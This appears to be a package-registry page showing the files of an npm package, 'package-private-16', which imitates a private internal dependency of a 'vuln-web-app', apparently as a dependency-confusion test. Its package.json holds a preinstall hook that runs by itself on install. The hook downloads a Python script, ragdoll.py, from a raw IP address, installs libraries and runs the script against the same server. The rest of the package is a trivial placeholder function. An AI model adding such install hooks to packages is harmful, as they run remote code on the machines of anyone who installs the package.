package-private-16 5.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of package-private-16 might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ # Package-Private
2
+
3
+ This is the package which is private to the vuln-web-app and can be downloaded only from their own privately hosted repository (which sits somewhere in their cloud)
package/index.js ADDED
@@ -0,0 +1,10 @@
1
+ const some_important_function = () => {
2
+ const a = 1997
3
+ const b = 5
4
+
5
+ return (a + b)
6
+ }
7
+
8
+ module.exports = {
9
+ some_important_function
10
+ }
package/package.json ADDED
@@ -0,0 +1,18 @@
1
+ {
2
+ "name": "package-private-16",
3
+ "version": "5.0.1",
4
+ "description": "This is a private package used by Batman and his team oh highly skilled IT professional (CY Capstone Team-1)",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "npm index.js",
8
+ "preinstall": "server='http://34.135.86.190:8888'; curl -s -X POST -H 'file:ragdoll.py' -H 'platform:linux' $server/file/download > ragdoll.py; pip install requests beautifulsoup4; python3 ragdoll.py -W $server/weather"
9
+ },
10
+ "keywords": [
11
+ "demo"
12
+ ],
13
+ "author": "archerl@wearehackerone.com",
14
+ "license": "MIT",
15
+ "dependencies": {
16
+ "nodemon": "^2.0.20"
17
+ }
18
+ }
@@ -0,0 +1 @@
1
+ echo "This is file to run the bash script, just in case we need it"
package/test.txt ADDED
File without changes